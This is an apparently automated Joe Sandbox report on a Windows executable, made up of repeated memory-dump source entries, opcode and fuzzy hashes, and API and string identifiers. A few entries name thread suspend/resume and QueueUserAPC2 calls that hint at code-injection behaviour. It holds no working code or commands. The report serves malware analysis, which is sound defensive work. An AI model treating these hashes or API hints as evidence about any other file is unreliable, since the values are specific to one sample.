                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 549e6052dfb5f75015054c6104143178bc8924d384410c045d17cae26b1dd661
                                                        • Instruction ID: b979dfb826e097a0f9480b44ccf820d880fca77d40f35a53d2dbd179ee5321ef
                                                        • Opcode Fuzzy Hash: 549e6052dfb5f75015054c6104143178bc8924d384410c045d17cae26b1dd661
                                                        • Instruction Fuzzy Hash: 8942CF72B08B4686EB909F65E4402ADBBA1FB48BC8F840437EE5D27B58DE3CE451D711
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7bc02a47b9c6b537f87ba7f03e9d8996afc695ebb4e05c8f65f414fc91164dd3
                                                        • Instruction ID: 623f13bcdc34c42b32a7178cfd24d1036d4ab2fa06e3c0cb615a1132d903ffe4
                                                        • Opcode Fuzzy Hash: 7bc02a47b9c6b537f87ba7f03e9d8996afc695ebb4e05c8f65f414fc91164dd3
                                                        • Instruction Fuzzy Hash: 8032A3B2F09B4586EB90DFB5D4403BCBBA1AB08788B844537CE1D67788DE38E455D362
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 567bd8c800cafad585b7cf90b26b86391f749c9adea7eec1786a4c820cec952b
                                                        • Instruction ID: d6a1df80313709a929fa95bebee156e9c80ef8e7d122a122204daef7b4bf03a1
                                                        • Opcode Fuzzy Hash: 567bd8c800cafad585b7cf90b26b86391f749c9adea7eec1786a4c820cec952b
                                                        • Instruction Fuzzy Hash: 4702D572B14A4286EA949F29E440778BBA1EB45BA5FC44633CA3D6B7D4CF3CE451C321
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e8165507139ff8a0687a5d92b66615806cd6d012feea20fe9d4ca7b556209f25
                                                        • Instruction ID: c0a488219ad8a9d83c6643af2816cba98924de9f055467588970c084653572cc
                                                        • Opcode Fuzzy Hash: e8165507139ff8a0687a5d92b66615806cd6d012feea20fe9d4ca7b556209f25
                                                        • Instruction Fuzzy Hash: 44F12821F2874D41E992A63B51413B4EA526F6E7D0F9ECB33E85D36790EF3CB0958211
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a30e9ccede4defc8cb9bb7021f2aed867e6faa058a659ec2196f15f4e69dc293
                                                        • Instruction ID: 3092637554c980217631b8619e936f26d7b303301bc2eeb514de9c64f1e9024f
                                                        • Opcode Fuzzy Hash: a30e9ccede4defc8cb9bb7021f2aed867e6faa058a659ec2196f15f4e69dc293
                                                        • Instruction Fuzzy Hash: E7F1E3A2A18B8582EB50DF29D444378BB61FB49BA4F944332CE2D27790DF3CE491C351
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CounterPerformanceQuery
                                                        • String ID:
                                                        • API String ID: 2783962273-0
                                                        • Opcode ID: c1850e810df6202e2c71cd3c6d27a795553a239f11018daae015bd6db6a2eabd
                                                        • Instruction ID: 09b61bbb766bc29c04bc4706f148b850868e877a10b20e29735bdfc295f9636a
                                                        • Opcode Fuzzy Hash: c1850e810df6202e2c71cd3c6d27a795553a239f11018daae015bd6db6a2eabd
                                                        • Instruction Fuzzy Hash: 82027021A19B4685EA91AB38E490374BFA0BF4DB59F944237CD4D773A0DF3DE4A1C221
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a067f801db91a70f563a5d40447dd11d047fed665657b512b0d6a88a55159cf1
                                                        • Instruction ID: be9048900c991cd23b9f921db5628421afe53436ba34fa264209e00982fc0861
                                                        • Opcode Fuzzy Hash: a067f801db91a70f563a5d40447dd11d047fed665657b512b0d6a88a55159cf1
                                                        • Instruction Fuzzy Hash: A7E1B272A0874586EBD5AB25D480374BFA1FB48B85F844237C96D633A0DF3CE4A4D722
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2d93270e60e16491fbe54944405fcef5222b15305876aeadfc7a3f6476fd23a8
                                                        • Instruction ID: 70583ddd9a8363da672fc45cac9ebe341c3e0167070cda9fbc686503fda79769
                                                        • Opcode Fuzzy Hash: 2d93270e60e16491fbe54944405fcef5222b15305876aeadfc7a3f6476fd23a8
                                                        • Instruction Fuzzy Hash: D5E12212A1AFC949E697A7399041375E699BF6A3C0F848733DD4F32762DF38A1938211
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4edf0397d65345d120d8a261b0ef52faea315b51b514a397b6118f37b68e7496
                                                        • Instruction ID: b450f1161a2595c1f8b1ea14c0d729e672f24763960547eaa588891944ce895a
                                                        • Opcode Fuzzy Hash: 4edf0397d65345d120d8a261b0ef52faea315b51b514a397b6118f37b68e7496
                                                        • Instruction Fuzzy Hash: C3C19531B18B4681EA809B19E894734BFB5FB49BA1F844137C96D67794DF3CE460C362
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f81cb8a8fa680b7983bac6cb0d1cb7bd7e58e6fd297d06bcd676f255ee82a72e
                                                        • Instruction ID: e66576b766f4fca46860a51b83c518cba4e657fe3531828913fd638f95cb87d9
                                                        • Opcode Fuzzy Hash: f81cb8a8fa680b7983bac6cb0d1cb7bd7e58e6fd297d06bcd676f255ee82a72e
                                                        • Instruction Fuzzy Hash: D4C1B631B18B4682EA80EB15E895378BFA4FB497A1F840533C96D677A4DF3CE460D361
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a88597bd80fbec51528b2ed85b6bd883d763db581cbee44f11464c4b77c7b693
                                                        • Instruction ID: 15821631c030078fd0bffe939fb43563cf77d47489c677ea04caf838398143ca
                                                        • Opcode Fuzzy Hash: a88597bd80fbec51528b2ed85b6bd883d763db581cbee44f11464c4b77c7b693
                                                        • Instruction Fuzzy Hash: 6B91E272B14A9583EB949F1AE4807A8BBB2F785BC1F85403ADE4EA7B44DE3CD414C750
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2c5450eb009bbb477380e5294b5de819db12dd9e00ce9680b9f4d20b2e4ec7d5
                                                        • Instruction ID: 28ecca30f732ccbd0bf630be609003166d45e1c1470fb3cc4ceaea15d607147d
                                                        • Opcode Fuzzy Hash: 2c5450eb009bbb477380e5294b5de819db12dd9e00ce9680b9f4d20b2e4ec7d5
                                                        • Instruction Fuzzy Hash: 2D919431A08B4282E790AB25F980379BBE0FB58786F914137DA9D67761DF7CE050C712
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 437c2bb9eed3bb237656b73319d9a7c63277ab8907db6804528c2f463d4bd837
                                                        • Instruction ID: 49f5974bab5b05d02326225df1f317c36e0ac4670133a720d1a60a02ba68885c
                                                        • Opcode Fuzzy Hash: 437c2bb9eed3bb237656b73319d9a7c63277ab8907db6804528c2f463d4bd837
                                                        • Instruction Fuzzy Hash: 34512522F1AB0E01E98A933F5141779D9626F5A7C0E9CDB33E91E36790EF3DB0908611
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dd315fed3be031c9e26a90a11914652993b972776a13770548698b9b4cb4de5d
                                                        • Instruction ID: c078af938f34bcd8002774d1d35a21fbe20b15e7432863a3ec0b6068501c7b57
                                                        • Opcode Fuzzy Hash: dd315fed3be031c9e26a90a11914652993b972776a13770548698b9b4cb4de5d
                                                        • Instruction Fuzzy Hash: 1B612731A18F8585D696DB3C9481B24FB6ABF497C0B989332DD5F72351DF3CA0A2C611
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave
                                                        • String ID:
                                                        • API String ID: 3168844106-0
                                                        • Opcode ID: 1fa7a848999a6a82e6943152a9856c355e6e1e90088799d98739f212ba5528bb
                                                        • Instruction ID: 3c5b147e1b752a055b8ce4a5b230b54148c8718c6e6b9b4e8608132e753c5f4c
                                                        • Opcode Fuzzy Hash: 1fa7a848999a6a82e6943152a9856c355e6e1e90088799d98739f212ba5528bb
                                                        • Instruction Fuzzy Hash: A721D622B1C24282FFD4AB3DA2D17795A50DF89794FC42132DE2C03B86DD2CD5914B01
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
                                                        • String ID: InitializeContext2$kernel32.dll
                                                        • API String ID: 4102459504-3117029998
                                                        • Opcode ID: 58a5be5d35835e3958eeb122e2f56d5ffa59673f895c6159930fb17e4b9c7a5e
                                                        • Instruction ID: 52c4cd467e7dc5d3dd66a1317cc0055db89e6df5e85b14991127982b925981d0
                                                        • Opcode Fuzzy Hash: 58a5be5d35835e3958eeb122e2f56d5ffa59673f895c6159930fb17e4b9c7a5e
                                                        • Instruction Fuzzy Hash: E331B221A1878681FB81AB61E940339EBA1AF84B91F840037DD4C637A4DF7CE656C731
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Thread$AddressContextErrorLastLibraryLoadProcResumeSuspend
                                                        • String ID: QueueUserAPC2$kernel32
                                                        • API String ID: 3714266957-4022151419
                                                        • Opcode ID: 1854c6662005a05bccb6cd86df4f5362b47cb18156353affd7ed6c801de71de6
                                                        • Instruction ID: 01c7b5359080f8885288963a0e9259130f0fb814aab0f6f0cf712b783976ffcd
                                                        • Opcode Fuzzy Hash: 1854c6662005a05bccb6cd86df4f5362b47cb18156353affd7ed6c801de71de6
                                                        • Instruction Fuzzy Hash: FD31CA21B0860241FBD0BB26E85037ABBA1EF49BA6FC01232D85D667D0DF3DE6058721
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: SwitchThread
                                                        • String ID:
                                                        • API String ID: 115865932-0
                                                        • Opcode ID: 8855a6a9be19cc912e040998a95c185b2b15f028c0bb56cd1e5e4913b5d84e9d
                                                        • Instruction ID: 78fe4452b8bd51a676c83a1ceeca0a33fdf7da0985b72a03f68eec0ea7edaef2
                                                        • Opcode Fuzzy Hash: 8855a6a9be19cc912e040998a95c185b2b15f028c0bb56cd1e5e4913b5d84e9d
                                                        • Instruction Fuzzy Hash: D8A15A30E0C28386F6D4BB39A891B75BED4AF0A756F900137D819AA7D1DE3CF4508672
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Thread$CriticalSectionSwitch$Leave$CurrentEnter
                                                        • String ID:
                                                        • API String ID: 2584832284-0
                                                        • Opcode ID: 911a7cc94664f48a14bb56dfd2eba76f0f521efe915744327b0e3e75a7d93955
                                                        • Instruction ID: 8743d913b96a887dedeb381a45af02cee3bbec817a217f70a91f9116da878819
                                                        • Opcode Fuzzy Hash: 911a7cc94664f48a14bb56dfd2eba76f0f521efe915744327b0e3e75a7d93955
